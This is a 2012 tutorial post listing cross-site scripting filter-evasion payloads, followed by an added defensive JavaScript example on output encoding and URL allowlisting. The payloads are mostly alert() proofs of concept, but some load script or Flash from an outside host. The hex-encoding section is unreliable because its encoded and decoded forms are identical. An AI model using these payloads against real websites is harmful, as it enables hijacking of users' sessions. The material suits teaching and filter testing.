Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28

1. Change character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another file extension in place of .js

    <script src="bad.jpg"></script>

4. Put JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert extra characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline to evade (the gaps inside "jav ascr ipt" are where the tab or newline characters go)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Decoded source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Decoded source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code embedded in a swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
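Added example, not from the original post: the JavaScript below looks at the list above from the defender's side. It shows why the variations in techniques 1, 5, 6 and 14 get past a blacklist regex, and what does hold up instead: HTML output encoding, a refusal of every on* handler attribute (technique 9) and of style, and a scheme allowlist for URL-valued attributes that normalises the string the way a browser's URL parser does (tab and newline dropped, leading controls trimmed, case folded) before reading the scheme. The samples are constructed from the payloads above; the function names, the allowed schemes and the allowed attribute names are my assumptions for this example, not anything the post specifies.

```javascript
// Added example (not the post's own code). Compares a naive blacklist with the two
// defences that actually work: output encoding and allowlisting after normalisation.

// Naive blacklist of the kind the tricks above are built to slip past: case-sensitive,
// and only matches an unbroken "<script>" or "javascript:". Returns true when the
// input would be let through.
function naiveBlacklistPasses(input) {
  return !/<script>/.test(input) && !/javascript:/.test(input);
}

// HTML-encode untrusted data for the text and double-quoted attribute contexts.
// Every character that could open a tag, attribute or JS string becomes an entity,
// so the browser renders the payload as text instead of parsing it. Case and
// inserted characters no longer matter because no tag is ever created.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// URL allowlist. Browsers drop tab, LF and CR anywhere in a URL and trim leading and
// trailing C0 controls and spaces before parsing the scheme, so the check normalises
// the same way: "jav<TAB>ascr<LF>ipt:" collapses to "javascript:" and is rejected.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto']; // assumption for this example
function isSafeUrl(url) {
  const normalised = String(url)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .toLowerCase();
  const m = normalised.match(/^([a-z][a-z0-9+.\-]*):/);
  if (!m) return true; // no scheme at all: a relative URL such as "t.js"
  return ALLOWED_SCHEMES.includes(m[1]);
}

// Attribute policy for markup rebuilt from untrusted input: every on* handler (the
// list under technique 9) and style are refused outright; URL-valued attributes,
// including the legacy dynsrc/lowsrc/background of technique 14, go through isSafeUrl;
// anything else must be on a short allowlist. Both lists are assumptions for the example.
const URL_ATTRS = ['src', 'href', 'dynsrc', 'lowsrc', 'background'];
const PLAIN_ATTRS = ['alt', 'title', 'class', 'id', 'width', 'height'];
function attributeIsAllowed(name, value) {
  const n = String(name).toLowerCase();
  if (n.startsWith('on') || n === 'style') return false;
  if (URL_ATTRS.includes(n)) return isSafeUrl(value);
  return PLAIN_ATTRS.includes(n);
}

// One link built from untrusted text and URL with both defences applied.
function renderLink(text, url) {
  const href = isSafeUrl(url) ? escapeHtml(url) : '#';
  return `<a href="${href}">${escapeHtml(text)}</a>`;
}

// Constructed samples drawn from the techniques above. In the tab/newline sample the
// control characters are real, not spaces.
const MARKUP_SAMPLES = [
  "<sCript>alert('d')</scRipT>",   // technique 1: mixed case
  '<SCRIPT/SRC="t.js"></SCRIPT>',  // technique 5: "/" instead of a space in the tag
];
const URL_SAMPLES = [
  "jav\tascr\nipt:alert('XSS3')",  // technique 6: tab and newline inside the scheme
  "JaVaScRiPt:alert('XSS27')",     // technique 14 with technique 1 applied to the scheme
  ' javascript:alert(1)',          // leading space, which the browser trims
  'https://example.com/page',      // constructed benign absolute URL
  't.js',                          // relative URL, as used in the post's payloads
];

// Run the checks over the samples and return the results for inspection.
function evaluateSamples() {
  return {
    markup: MARKUP_SAMPLES.map((s) => ({
      sample: s,
      blacklistLetsThrough: naiveBlacklistPasses(s), // true for both: the blacklist fails
      encoded: escapeHtml(s),                        // never contains "<"
    })),
    urls: URL_SAMPLES.map((s) => ({
      sample: s,
      blacklistLetsThrough: naiveBlacklistPasses(s), // true for the tab and mixed-case forms
      acceptedAsUrl: isSafeUrl(s),                   // false for every javascript: form
    })),
  };
}

console.table(evaluateSamples().markup);
console.table(evaluateSamples().urls);
console.log(renderLink('<b>click</b>', "javascript:alert('XSS')"));
```

Run it with node. The point of the normalisation in isSafeUrl is that a filter has to see the URL the way the browser's parser will: tabs and newlines are removed and leading controls trimmed before the scheme is read, so comparing against the raw string, as the naive blacklist does, is exactly what makes technique 6 work. Encoding on output rather than filtering on input is what makes techniques 1, 2 and 5 irrelevant, because the browser never receives a tag to parse.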